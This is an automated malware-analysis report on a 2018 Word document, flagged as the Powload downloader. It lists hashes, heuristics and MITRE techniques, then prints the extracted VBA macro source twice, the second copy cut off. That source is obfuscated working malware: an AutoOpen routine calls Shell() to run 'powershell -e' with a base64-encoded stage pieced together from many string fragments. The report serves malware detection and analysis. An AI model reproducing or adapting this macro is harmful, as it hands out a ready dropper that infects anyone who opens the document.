Office (OLE) malware analysis — malicious · 0059cf6c0e3e233d

MALICIOUS

Office (OLE)

94.8 KB Created: 2018-06-08 22:11:00 Authoring application: Microsoft Office Word First seen: 2018-06-25

MD5: c4817e32b1aac6b6cce223668c742d9b SHA-1: b72ab48ec0cc96accc4f8fbeb01575e497747aa2 SHA-256: 0059cf6c0e3e233d4e59fb11d2532f090fc474027e2957819d6d4a1a9e30e44b

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro. The Autoopen subroutine triggers the execution of the oiOjVSFjhGw function, which uses the Shell() function. This function is used to execute a command constructed from concatenated strings, including 'powershell'. This indicates the macro is designed to download and execute a second-stage payload. The ClamAV detection name 'Doc.Malware.Powload-6799120-0' further supports this assessment.

Heuristics 7

ClamAV: Doc.Malware.Powload-6799120-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Powload-6799120-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

Next
oiOjVSFjhGw = fmjDYiibl + Shell(cwBJJlsiF + Chr(okpmzhHtCFp + vbKeyP + fMpib) + "owers" + QlmMA + KiDCLthBoiw + oMTEIoiOCH + kiHZjY + iBudKJnR, 36982 - 36982)
For bmPBmW = ATSiGN To qiKfL

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12644 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12644 bytes
SHA-256: `042347550a96938b1822e75d9ac05b5c89a7d159eb992d5a6fae18651c742fb1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "VbFMwkGTQDjPp" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function oiOjVSFjhGw() On Error Resume Next For JmjkmC = AENFC To tSFFw For PPRknP = lYjij To 30074 JAdZzI = (43941 / CBool(LwSLpM) - DVDqHE / Oct(59485 / Hex(85723) / wVbQm + Rnd(WipEC / Fix(37)))) Next ojFoGn = 6594 - 36676 Next For cZzrV = itHtf To bdijG For uboVlK = OpzBB To 32902 ZkTviZ = (33480 / CBool(slhKX) - MDbIAz / Oct(17024 / Hex(83588) / GonqGY + Rnd(rGcDhr / Fix(37)))) Next jCjYr = 67995 - 4656 Next oiOjVSFjhGw = fmjDYiibl + Shell(cwBJJlsiF + Chr(okpmzhHtCFp + vbKeyP + fMpib) + "owers" + QlmMA + KiDCLthBoiw + oMTEIoiOCH + kiHZjY + iBudKJnR, 36982 - 36982) For bmPBmW = ATSiGN To qiKfL For bhUDVt = FTZRIb To 36370 BbElJ = (96594 / CBool(Jkzkv) - LwNLXI / Oct(23687 / Hex(87597) / Ljsin + Rnd(uAZfus / Fix(37)))) Next GGtBvV = 46902 - 67544 Next End Function Sub Autoopen() On Error Resume Next For lzOuV = FkSGU To QYtfKZ For jaFBk = sHSVM To 83123 jHuuP = (87187 / CBool(ivpMn) - GphAW / Oct(71224 / Hex(90705) / zdjwi + Rnd(cFnOG / Fix(37)))) Next wzIdw = 29752 - 33491 Next oiOjVSFjhGw For joksN = PCZSz To wLkdOw For VidIaG = ZHjDB To 13360 jdKtn = (66835 / CBool(IafUP) - TnPfPz / Oct(57385 / Hex(92294) / CjJmpm + Rnd(VWQsH / Fix(37)))) Next iZkaP = 36985 - 24719 Next End Sub Attribute VB_Name = "znLbFmsB" Function QlmMA() On Error Resume Next For QtjaJ = jtYqrW To KUFoqK For hjJhad = NWqDGa To 96283 cEJJR = (26835 / CBool(DhNOQ) - ahiShq / Oct(38086 / Hex(70320) / wAfwVX + Rnd(nlvdss / Fix(37)))) Next fjtNN = 55083 - 53888 Next CAwmIcRq = "HeLL -e KAAgA" + "G4AZQB3" + "AC0ATwBC" + "AE" For MNpno = lZkih To FJiUrw For ucSmD = jDlncG To 15243 inSGi = (66833 / CBool(BLLzL) - vVCYV / Oct(31792 / Hex(13842) / stamFH + Rnd(AlHXZ / Fix(37)))) Next bVLOJN = 91704 - 87003 Next BtYzRI = "oARQBDA" + "FQAIAAgAGkAbw" + "AuAEM" + "ATwBtAFA" + "AUgBFAHMAUwBpAE" + "8ATgAuAGQARQB" For Hnshl = jPHqAa To trUdbU For ZDblQ = AqKMC To 22137 bmntXW = (45942 / CBool(WAhYJ) - cUtfmb / Oct(85445 / Hex(82739) / LGRRh + Rnd(FunpmJ / Fix(37)))) Next DaGEw = 68224 - 5751 Next aMAwNa = "GAGwAQQB" + "0AEUAcwB0AF" + "IAZQ" + "BBAE0AKAAg" + "AFsAcwB5AFM" + "AVABF" + "AE0ALgBp" + "AG8ALgBtAEUAT" + "QBvAFIAeQBzAHQA" For tNHiY = QhPkv To ibnFFq For RFujW = UQSYii To 17227 ARtKmJ = (43145 / CBool(NXEqZY) - nBwGKl / Oct(94925 / Hex(99460) / kwDFwI + Rnd(GmwiKu / Fix(37)))) Next ShCdsW = 59133 - 62284 Next BhTKQt = "UgBlAGEAb" + "QBdACAAWwBDAE" + "8ATgB2AGU" + "AUgB0AF0AOgA" + "6AEYAUgBPA" For wofXj = wCDRP To oFRqE For wDcqRs = fYIIE To 56441 ErHQSl = (94140 / CBool(oufsiV) - blnofj / Oct(55782 / Hex(58500) / WmREz + Rnd(uwoQVz / Fix(37)))) Next AXSuQO = 66036 - 20485 Next biVqzStBWMm = "E0AQgBBAF" + "MA" + "RQA2ADQAUwB0AF" + "IASQBO" + "AGcAK" + "AAgACcAVgBaAEI" For NkBwW = QzSbM To ufUsi For zhDOzh = lPVlPO To 92463 wZhCCT = (48967 / CBool(qzukwF) - wBhQid / Oct(41820 / Hex(99258) / UTlFuM + Rnd(MQGzG / Fix(37)))) Next qfiazN = 31373 - 10430 Next srApzz = "AdABUADgASQB3A" + "EYARQBiAC8AUw" + "BqADgAcwBHA" + "FkAdgBTAFkAZwB" + "RAE4ATgBDAFk" + "AawBpAGcAWQB" + "FAEo" + "ARQA0ADAAR" + "QBoAFA" + "AVABkAFgAZ" For jfWXkh = NRbZzi To iTmivh For qIlKL = lIdIj To 59212 mFiXc = (40337 / CBool(DoWhq) - vwGMj / Oct(40765 / Hex(45637) / qXlMYf + Rnd(EnSqS / Fix(37)))) Next zckPB = 50276 - 35970 Next XfSOqqd = "QBzAHMAcg" + "BYAFEAR" + "gBnAFkAag" + "AvAEgAZQB" + "MAHYAQw" + "BSAC" + "sAYQBkAEsAZQ" For ClEUD = pCRZO To twhzK For pCwAD = XwwTVw To 64644 FNnmjr = (41375 / CBool(XCWtb) - QAvnF / Oct(96412 / Hex(70347) / QBiNw + Rnd(HVjUr / Fix(37)))) Next CjIvR = 35705 - 65294 Next NMdnj = "A1ACsAVABlAHAA" + "OQA1AGsAVQBK" + "AFQAbQB" + "GAGQAM" + "ABoAEMAVQB" + "WAFYAUgBUAC8" + "AQQBMA" + "GQASgBNAH" For fwdKP = fzXir To KpwmES For OQBWCB = JksAW To 74630 TkUXX = (97159 / CBool(aKzwcI) - MjWrw / Oct(45472 / Hex(36555) / iabIGD + Rnd(FXMETq / Fix(37)))) Next cOjUK = 77576 - 13041 Next LDzIQ = "gAaQBx" + "AG4AbgBoAD" + "YAVQB5AGUAUQAv" + "AEMAagBmA" + "EcAUQB" + "vADYASABZAFAARQ" For YZtAw = WIXPz To GuwPs For fEZlYo = IHHLd To 24907 taCCOF = (14262 / CBool(jOopWW) - hRQciI / Oct(3967 / Hex(57103) / AEinuO + Rnd(uCSafr / Fix(37)))) Next AmZlVL = 94051 - 67046 Next TQDPPWtQ = "BIAFIAUABlAFoAQ" + "QBHA" + "G0" + "AcAAxADMAcwBwA" + "FAAcgBVAEwA" QlmMA = CAwmIcRq + BtYzRI + aMAwNa + BhTKQt + biVqzStBWMm + srApzz + XfSOqqd + NMdnj + LDzIQ + TQDPPWtQ End Function Function KiDCLthBoiw() On Error Resume Next For vJZqu = iVrwP To KXTzU For unDvS = XQpEXj To 35945 SlniUY = (6535 / CBool(Twjics) - PFlAtC / Oct(91527 / Hex(29172) / qjSdMi + Rnd(KiajYk / Fix(37)))) Next iwNBTG = 23034 - 69647 Next SrMdUPPI = "Kw" + "BxAG0" + "AMQA4AHgAWQBo" + "AGEAbQBuAFMAag" For iaazl = YnWWnn To FZjpwZ For BJRfQ = EfAbI To 75893 VnDli = (23958 / CBool(FnMBwC) - qoViIm / Oct(60938 / Hex(23174) / Iviia + Rnd(muOAjQ / Fix(37)))) Next VuKmu = 98544 - 28323 Next McVqrTNp = "Bj" + "AFIAYwA1AFEAUw" + "BTADkAOA" + "BiAEMA" + "RA" + "BFAG4ANw" + "BpAEYAWQBzAGMAN" + "AByAG" + "cAQw" For PiNONr = wAAaJS To qwhEMA For nwVcY = bUWsj To 94851 sMVQM = (2644 / CBool(zOzFH) - aDOEpm / Oct(27092 / Hex(58954) / msloYD + Rnd(iHuLuC / Fix(37)))) Next aRrKtU = 48826 - 93592 Next CAKQGbibM = "B1AHMA" + "bABTAF" + "YAWgByAGYAUwBZA" + "HMAbQB3AH" + "EAMgBkAHoARABU" + "AHAARgAvA" + "HYAMw" For VasXG = DtjtQ To cfXcDV For rLvEYZ = nwbUKC To 80132 QOjjVM = (9508 / CBool(cAlDw) - TipwpF / Oct(9724 / Hex(49606) / TwTiE + Rnd(OjNkA / Fix(37)))) Next JvXzX = 74275 - 19492 Next zXKPwjuW = "BC" + "AGgAKw" + "BaAHIAT" + "gBzAGEA" + "WAB" + "JAFEAb" For DnVpB = tfMNkW To tNiCiA For ORXTzX = mSwRS To 90231 Rjcic = (50073 / CBool(jWAAi) - Pipzp / Oct(74014 / Hex(51600) / mPCsi + Rnd(GMNvS / Fix(37)))) Next jbjFYF = 50194 - 21371 Next jFjwncBOrq = "wB" + "IA" + "EUATQB4AE4A" + "VABHADgAYQ" + "BoAH" KiDCLthBoiw = SrMdUPPI + McVqrTNp + CAKQGbibM + zXKPwjuW + jFjwncBOrq End Function Function oMTEIoiOCH() On Error Resume Next For uXTTzu = dBcfU To fQalw For RWJEh = onBjY To 68215 PZrsi = (48315 / CBool(ZCjMSm) - jwQim / Oct(13856 / Hex(39180) / IlSlQK + Rnd(CtctT / Fix(37)))) Next dnYrM = 37246 - 62116 Next jEQGiOQ = "oAWgBpAF" + "UAcgB5AHoA" + "OAB0ADAAbQBU" + "AGMA" + "MQBaADAA" + "Ng" + "BFAEIAKwBIADgA" + "MAB6AFk" + "AaQB0AC8" + "AMgB" For nzmvu = rlFmc To VQGazI For SApjZ = DDIsn To 49585 ofVnfp = (43959 / CBool(PQoqR) - iMjztE / Oct(97960 / Hex(26767) / zNMdq + Rnd(itRMo / Fix(37)))) Next qvSuI = 71724 - 33513 Next KZcrzLAIm = "BACsAcQ" + "B4AFkA" + "bA" + "BMAGsA" + "YgBqAHY" + "AdgAwAEIAVg" For jBsIq = qbutV To aQYaTL For wjXWic = rRODl To 37262 LivUEm = (41141 / CBool(GzYrz) - aWsbwF / Oct(35741 / Hex(42121) / fOfTd + Rnd(NrHBH / Fix(37)))) Next mcFOZ = 20972 - 72066 Next wraFrwkjUFI = "BMAF" + "cATgB2AEsAMQBTA" + "FYAcQBOAHEAOABi" + "AHQAVgB" + "zAFgAe" For YzndtR = VbpOOp To QGYTr For sIRpsO = umMWuh To 91807 hbCZMi = (84639 / CBool(SnsZT) - zpGTz / Oct(63850 / Hex(30967) / zkfdAj + Rnd(SUhti / Fix(37)))) Next iWtfJA = 86297 - 97979 Next kHNcXZAo = "QBCAGEAb" + "QBwADAAZgA" + "3AEIATQBoA" + "FYAeQAvAFcA" + "YgBvAHcAdgBrAG" + "YALwBuAH" + "UAUABNAHIAdQ" + "BpAG0ARQBOA" For zoTin = QajOY To dRuii For zzTKj = cUTMnn To 62025 hvlqJ = (33243 / CBool(tBtwiF) - BEzwir / Oct(87010 / Hex(98315) / pIdGSC + Rnd(nviAT / Fix(37)))) Next jEYNNG = 96279 - 49454 Next nPrHDN = "FAAawAyAFUAQg" + "BzAGIAVA" + "BpAHIAZAA0A" + "DcAagA2A" + "HAAUAB" + "oAEkAUwBI" + "AGQAbwBIAF" + "cANgBzA" + "DMAM" + "gA4AE8AWAA0AFE" oMTEIoiOCH = jEQGiOQ + KZcrzLAIm + wraFrwkjUFI + kHNcXZAo + nPrHDN End Function Function kiHZjY() On Error Resume Next For BktTP = rJodi To whfKd For zGCwEP = YvXRi To 74271 JcHtM = (99029 / CBool(rwmuWl) - kWtCk / Oct(31331 / Hex(1351) / KEfiz + Rnd(RTrJrh / Fix(37)))) Next Talwd = 5772 - 10805 Next JFRwkbasv = "AZABWAHkARQB5A" + "HgAKwBGAEYA" + "awBjAEkA" + "cgB" + "pAE" + "4AeABWAGEAT" For PCiiw = ZiOuWA To SCOizw For cukfDR = vHEGN To 90546 uCzAB = (6550 / CBool(ocOVjN) - YWQdG / Oct(59447 / Hex(63941) / SCahX + Rnd(WKoJFj / Fix(37)))) Next ARhws = 67095 - 77097 Next zHwqtE = "AB" + "lAFMAM" + "ABF" + "AGwAeQBpADQA" + "OABpAEEAaA" For VKWDP = kocGQ To ZkuaTj For RSaLb = dYEiiO To 92352 CwrDdH = (11397 / CBool(VLCpEw) - XGfMU / Oct(42663 / Hex(99389) / wvWlzf + Rnd(wsUiW / Fix(37)))) Next CWqYIf = 93284 - 29598 Next RrtuXQLb = "BwAFoAcABXAHg" + "AM" + "QBwAHgAYwBH" + "AFkA" + "MAB6AE8ATgAzAE" + "oAQQBaADMAWABGA" + "G0AZQBiAG8AdAB0" + "AEwA" For mciIh = zBbWDB To IGWGGQ For KUVbc = kooMq To 6112 pItGrw = (57564 / CBool(qsLTmJ) - jCBZj / Oct(4127 / Hex(97755) / HDfNr + Rnd(NPjzV / Fix(37)))) Next zNPPI = 73436 - 28832 Next uVinS = "QgBRAFQA" + "WgBXAHgAe" + "QBQAHYARwB" + "uAF" + "QAVwBIAHUAU" + "gBWAEsANABv" + "AEUAegAyAEI" + "AVABvAGIAdgB" + "jAEwAJwAgACkAI" For cJIpL = FmKQW To qqlDLl For nddfTQ = OVnmR To 88852 ipwvpB = (42802 / CBool(bFPds) - JbLDX / Oct(158 / Hex(53782) / zioZGH + Rnd(wXzcqL / Fix(37)))) Next nIVjP = 63259 - 3272 Next QOHDcblAap = "AAsACAAWwBJA" + "G8ALgBDAE8AbQ" + "BQAHIAZQBTAF" + "MAaQBP" + "AE" + "4AL" For PqYrF = bjuuLn To UGQvPW For hQABCH = Chnkvp To 52378 wAOBo = (44410 / CBool(FifXLT) - FnAJZ / Oct(80852 / Hex(99442) / WpwGZB + Rnd(JQwOF / Fix(37)))) Next PhNhF = 87494 - 20423 Next lFsNXCMKP = "gB" + "DAE8AbQBQAFI" + "ARQBTAHMAaQBv" + "AE4AbQB" + "vAEQAZQBd" + "ADoAOgBEAEUAQwB" + "PAG0AcABSAE" + "UAUwBTACAA" For WiwUA = AjlQlO To dZDiw For wYPZwO = pGmbTw To 79025 ALCmY = (48611 / CBool(aiidr) - lHKzHG / Oct(22431 / Hex(87660) / EzGGm + Rnd(wJwoZk / Fix(37)))) Next OBwZNs = 96628 - 69349 Next hPccK = "KQB8AC" + "AARgBvAHIAZQBBA" + "EM" + "ASAAtAG8AQgBqAG" + "UAQwB0AH" + "sAbgBlAHcALQBPA" kiHZjY = JFRwkbasv + zHwqtE + RrtuXQLb + uVinS + QOHDcblAap + lFsNXCMKP + hPccK End Function Function iBudKJnR() On Error Resume Next For SWuEwc = MpdisG To jSmMd For mpROH = IDhsSv To 45199 jjMiu = (37992 / CBool(jwwGlI) - QHajUO / Oct(8905 / Hex(56917) / fwFUZ + Rnd(zKiVrV / Fix(37)))) Next FERJpC = 81594 - 41270 Next mKnUIPlZu = "EIASg" + "BFAEMAV" + "AAgAHMAWQ" + "BzAHQARQBNA" + "C4ASQ" + "BPAC4AcwB0A" + "FIAZQBB" + "AG0Acg" + "BlAGEARAB" For WlJma = maJJD To jlpzHE For lYQQd = BVOKZ To 3782 jXZTKm = (8284 / CBool(XHLiST) - TbKiz / Oct(78420 / Hex(68844) / GUjTYw + Rnd(QkHQt / Fix(37)))) Next LWoUA = 44012 - 27263 Next AzBzuMJX = "FAFIAKAAgACQA" + "XwAsAFsA" + "cwBZAHMA" + "dABFAG0ALgB0AE" + "UAe" For EhLzc = mArEw To nTwiS For iwrbaC = QHFVN To 94519 VTBnU = (37933 / CBool(tmQtDR) - VsXKBV / Oct(77960 / Hex(29365) / cGJaM + Rnd(jidHji / Fix(37)))) Next RLJzj = 78295 - 24746 Next PpHvj = "ABUAC4ARQ" + "BuAGMA" + "bw" + "BEAGkA" + "bgBnAF0AOgA6A" + "GEAUwBjAEkASQA" For iXkfuO = KLcdGv To jLtkz For lPwlP = aLACl To 99665 zujYu = (33876 / CBool(wTSiDY) - sfzFz / Oct(82211 / Hex(14480) / SbzQtn + Rnd(KIqdD / Fix(37)))) Next iznwSR = 14050 - 33786 Next auiivQNGM = "gACkAfQApA" + "C4AcgBFA" + "EE" + "AZABUAG8AZ" + "QBOAEQAK" + "AApAC" + "AAfAAgACYAIAA" For Rircij = wmJuG To HZiYsa For JoZUb = iKHjZ To 437 VKRZR = (11419 / CBool(HMDUJr) - pNTuY / Oct(62427 / Hex(15359) / cIWBTz + Rnd(oFjuiG / Fix(37)))) Next IEGnjC = 94708 - 71817 Next RMRdMIoWG = "oACAAJABzAGgAR" + "QBsAGw" + "AaQB" + "kAFsAMQBdA" + "CsAJABzAGgA" + "RQBs" + "AEwAaQBkAFsA" + "MQAzAF0AKw" + "AnAFgA" For LkLtz = mBTQhh To CQmtP For zlOIv = FOnkwF To 82551 DLQHEu = (1996 / CBool(haRZP) - CqAqma / Oct(76710 / Hex(38559) / bQBsZz + Rnd(WKqqF / Fix(37)))) Next zioVWd = 6711 - 76040 Next VKXfAUC = "JwApAA" + "==" iBudKJnR = mKnUIPlZu + AzBzuMJX + PpHvj + auiivQNGM + RMRdMIoWG + VKXfAUC End Function

SHA-256: 042347550a96938b1822e75d9ac05b5c89a7d159eb992d5a6fae18651c742fb1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "VbFMwkGTQDjPp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function oiOjVSFjhGw()
On Error Resume Next
For JmjkmC = AENFC To tSFFw
      For PPRknP = lYjij To 30074
         JAdZzI = (43941 / CBool(LwSLpM) - DVDqHE / Oct(59485 / Hex(85723) / wVbQm + Rnd(WipEC / Fix(37))))
Next
   ojFoGn = 6594 - 36676
Next
For cZzrV = itHtf To bdijG
      For uboVlK = OpzBB To 32902
         ZkTviZ = (33480 / CBool(slhKX) - MDbIAz / Oct(17024 / Hex(83588) / GonqGY + Rnd(rGcDhr / Fix(37))))
Next
   jCjYr = 67995 - 4656
Next
oiOjVSFjhGw = fmjDYiibl + Shell(cwBJJlsiF + Chr(okpmzhHtCFp + vbKeyP + fMpib) + "owers" + QlmMA + KiDCLthBoiw + oMTEIoiOCH + kiHZjY + iBudKJnR, 36982 - 36982)
For bmPBmW = ATSiGN To qiKfL
      For bhUDVt = FTZRIb To 36370
         BbElJ = (96594 / CBool(Jkzkv) - LwNLXI / Oct(23687 / Hex(87597) / Ljsin + Rnd(uAZfus / Fix(37))))
Next
   GGtBvV = 46902 - 67544
Next
End Function
Sub Autoopen()
On Error Resume Next
For lzOuV = FkSGU To QYtfKZ
      For jaFBk = sHSVM To 83123
         jHuuP = (87187 / CBool(ivpMn) - GphAW / Oct(71224 / Hex(90705) / zdjwi + Rnd(cFnOG / Fix(37))))
Next
   wzIdw = 29752 - 33491
Next
oiOjVSFjhGw
For joksN = PCZSz To wLkdOw
      For VidIaG = ZHjDB To 13360
         jdKtn = (66835 / CBool(IafUP) - TnPfPz / Oct(57385 / Hex(92294) / CjJmpm + Rnd(VWQsH / Fix(37))))
Next
   iZkaP = 36985 - 24719
Next
End Sub


Attribute VB_Name = "znLbFmsB"
Function QlmMA()
On Error Resume Next
For QtjaJ = jtYqrW To KUFoqK
      For hjJhad = NWqDGa To 96283
         cEJJR = (26835 / CBool(DhNOQ) - ahiShq / Oct(38086 / Hex(70320) / wAfwVX + Rnd(nlvdss / Fix(37))))
Next
   fjtNN = 55083 - 53888
Next
CAwmIcRq = "HeLL -e KAAgA" + "G4AZQB3" + "AC0ATwBC" + "AE"
For MNpno = lZkih To FJiUrw
      For ucSmD = jDlncG To 15243
         inSGi = (66833 / CBool(BLLzL) - vVCYV / Oct(31792 / Hex(13842) / stamFH + Rnd(AlHXZ / Fix(37))))
Next
   bVLOJN = 91704 - 87003
Next
BtYzRI = "oARQBDA" + "FQAIAAgAGkAbw" + "AuAEM" + "ATwBtAFA" + "AUgBFAHMAUwBpAE" + "8ATgAuAGQARQB"
For Hnshl = jPHqAa To trUdbU
      For ZDblQ = AqKMC To 22137
         bmntXW = (45942 / CBool(WAhYJ) - cUtfmb / Oct(85445 / Hex(82739) / LGRRh + Rnd(FunpmJ / Fix(37))))
Next
   DaGEw = 68224 - 5751
Next
aMAwNa = "GAGwAQQB" + "0AEUAcwB0AF" + "IAZQ" + "BBAE0AKAAg" + "AFsAcwB5AFM" + "AVABF" + "AE0ALgBp" + "AG8ALgBtAEUAT" + "QBvAFIAeQBzAHQA"
For tNHiY = QhPkv To ibnFFq
      For RFujW = UQSYii To 17227
         ARtKmJ = (43145 / CBool(NXEqZY) - nBwGKl / Oct(94925 / Hex(99460) / kwDFwI + Rnd(GmwiKu / Fix(37))))
Next
   ShCdsW = 59133 - 62284
Next
BhTKQt = "UgBlAGEAb" + "QBdACAAWwBDAE" + "8ATgB2AGU" + "AUgB0AF0AOgA" + "6AEYAUgBPA"
For wofXj = wCDRP To oFRqE
      For wDcqRs = fYIIE To 56441
         ErHQSl = (94140 / CBool(oufsiV) - blnofj / Oct(55782 / Hex(58500) / WmREz + Rnd(uwoQVz / Fix(37))))
Next
   AXSuQO = 66036 - 20485
Next
biVqzStBWMm = "E0AQgBBAF" + "MA" + "RQA2ADQAUwB0AF" + "IASQBO" + "AGcAK" + "AAgACcAVgBaAEI"
For NkBwW = QzSbM To ufUsi
      For zhDOzh = lPVlPO To 92463
         wZhCCT = (48967 / CBool(qzukwF) - wBhQid / Oct(41820 / Hex(99258) / UTlFuM + Rnd(MQGzG / Fix(37))))
Next
   qfiazN = 31373 - 10430
Next
srApzz = "AdABUADgASQB3A" + "EYARQBiAC8AUw" + "BqADgAcwBHA" + "FkAdgBTAFkAZwB" + "RAE4ATgBDAFk" + "AawBpAGcAWQB" + "FAEo" + "ARQA0ADAAR" + "QBoAFA" + "AVABkAFgAZ"
For jfWXkh = NRbZzi To iTmivh
      For qIlKL = lIdIj To 59212
         mFiXc = (40337 / CBool(DoWhq) - vwGMj / Oct(40765 / Hex(45637) / qXlMYf + Rnd(EnSqS / Fix(37))))
Next
   zckPB = 50276 - 35970
Next
XfSOqqd = "QBzAHMAcg" + "BYAFEAR" + "gBnAFkAag" + "AvAEgAZQB" + "MAHYAQw" + "BSAC" + "sAYQBkAEsAZQ"
For ClEUD = pCRZO To twhzK
      For pCwAD = XwwTVw To 64644
         FNnmjr = (41375 / CBool(XCWtb) - QAvnF / Oct(96412 / Hex(70347) / QBiNw + Rnd(HVjUr / Fix(37))))
Next
   CjIvR = 35705 - 65294
Next
NMdnj = "A1ACsAVABlAHAA" + "OQA1AGsAVQBK" + "AFQAbQB" + "GAGQAM" + "ABoAEMAVQB" + "WAFYAUgBUAC8" + "AQQBMA" + "GQASgBNAH"
For fwdKP = fzXir To KpwmES
      For OQBWCB = JksAW To 74630
         TkUXX = (97159 / CBool(aKzwcI) - MjWrw / Oct(45472 / Hex(36555) / iabIGD + Rnd(FXMETq / Fix(37))))
Next
   cOjUK = 77576 - 13041
Next
LDzIQ = "gAaQBx" + "AG4AbgBoAD" + "YAVQB5AGUAUQAv" + "AEMAagBmA" + "EcAUQB" + "vADYASABZAFAARQ"
For YZtAw = WIXPz To GuwPs
      For fEZlYo = IHHLd To 24907
         taCCOF = (14262 / CBool(jOopWW) - hRQciI / Oct(3967 / Hex(57103) / AEinuO + Rnd(uCSafr / Fix(37))))
Next
   AmZlVL = 94051 - 67046
Next
TQDPPWtQ = "BIAFIAUABlAFoAQ" + "QBHA" + "G0" + "AcAAxADMAcwBwA" + "FAAcgBVAEwA"
QlmMA = CAwmIcRq + BtYzRI + aMAwNa + BhTKQt + biVqzStBWMm + srApzz + XfSOqqd + NMdnj + LDzIQ + TQDPPWtQ
End Function
Function KiDCLthBoiw()
On Error Resume Next
For vJZqu = iVrwP To KXTzU
      For unDvS = XQpEXj To 35945
         SlniUY = (6535 / CBool(Twjics) - PFlAtC / Oct(91527 / Hex(29172) / qjSdMi + Rnd(KiajYk / Fix(37))))
Next
   iwNBTG = 23034 - 69647
Next
SrMdUPPI = "Kw" + "BxAG0" + "AMQA4AHgAWQBo" + "AGEAbQBuAFMAag"
For iaazl = YnWWnn To FZjpwZ
      For BJRfQ = EfAbI To 75893
         VnDli = (23958 / CBool(FnMBwC) - qoViIm / Oct(60938 / Hex(23174) / Iviia + Rnd(muOAjQ / Fix(37))))
Next
   VuKmu = 98544 - 28323
Next
McVqrTNp = "Bj" + "AFIAYwA1AFEAUw" + "BTADkAOA" + "BiAEMA" + "RA" + "BFAG4ANw" + "BpAEYAWQBzAGMAN" + "AByAG" + "cAQw"
For PiNONr = wAAaJS To qwhEMA
      For nwVcY = bUWsj To 94851
         sMVQM = (2644 / CBool(zOzFH) - aDOEpm / Oct(27092 / Hex(58954) / msloYD + Rnd(iHuLuC / Fix(37))))
Next
   aRrKtU = 48826 - 93592
Next
CAKQGbibM = "B1AHMA" + "bABTAF" + "YAWgByAGYAUwBZA" + "HMAbQB3AH" + "EAMgBkAHoARABU" + "AHAARgAvA" + "HYAMw"
For VasXG = DtjtQ To cfXcDV
      For rLvEYZ = nwbUKC To 80132
         QOjjVM = (9508 / CBool(cAlDw) - TipwpF / Oct(9724 / Hex(49606) / TwTiE + Rnd(OjNkA / Fix(37))))
Next
   JvXzX = 74275 - 19492
Next
zXKPwjuW = "BC" + "AGgAKw" + "BaAHIAT" + "gBzAGEA" + "WAB" + "JAFEAb"
For DnVpB = tfMNkW To tNiCiA
      For ORXTzX = mSwRS To 90231
         Rjcic = (50073 / CBool(jWAAi) - Pipzp / Oct(74014 / Hex(51600) / mPCsi + Rnd(GMNvS / Fix(37))))
Next
   jbjFYF = 50194 - 21371
Next
jFjwncBOrq = "wB" + "IA" + "EUATQB4AE4A" + "VABHADgAYQ" + "BoAH"
KiDCLthBoiw = SrMdUPPI + McVqrTNp + CAKQGbibM + zXKPwjuW + jFjwncBOrq
End Function
Function oMTEIoiOCH()
On Error Resume Next
For uXTTzu = dBcfU To fQalw
      For RWJEh = onBjY To 68215
         PZrsi = (48315 / CBool(ZCjMSm) - jwQim / Oct(13856 / Hex(39180) / IlSlQK + Rnd(CtctT / Fix(37))))
Next
   dnYrM = 37246 - 62116
Next
jEQGiOQ = "oAWgBpAF" + "UAcgB5AHoA" + "OAB0ADAAbQBU" + "AGMA" + "MQBaADAA" + "Ng" + "BFAEIAKwBIADgA" + "MAB6AFk" + "AaQB0AC8" + "AMgB"
For nzmvu = rlFmc To VQGazI
      For SApjZ = DDIsn To 49585
         ofVnfp = (43959 / CBool(PQoqR) - iMjztE / Oct(97960 / Hex(26767) / zNMdq + Rnd(itRMo / Fix(37))))
Next
   qvSuI = 71724 - 33513
Next
KZcrzLAIm = "BACsAcQ" + "B4AFkA" + "bA" + "BMAGsA" + "YgBqAHY" + "AdgAwAEIAVg"
For jBsIq = qbutV To aQYaTL
      For wjXWic = rRODl To 37262
         LivUEm = (41141 / CBool(GzYrz) - aWsbwF / Oct(35741 / Hex(42121) / fOfTd + Rnd(NrHBH / Fix(37))))
Next
   mcFOZ = 20972 - 72066
Next
wraFrwkjUFI = "BMAF" + "cATgB2AEsAMQBTA" + "FYAcQBOAHEAOABi" + "AHQAVgB" + "zAFgAe"
For YzndtR = VbpOOp To QGYTr
      For sIRpsO = umMWuh To 91807
         hbCZMi = (84639 / CBool(SnsZT) - zpGTz / Oct(63850 / Hex(30967) / zkfdAj + Rnd(SUhti / Fix(37))))
Next
   iWtfJA = 86297 - 97979
Next
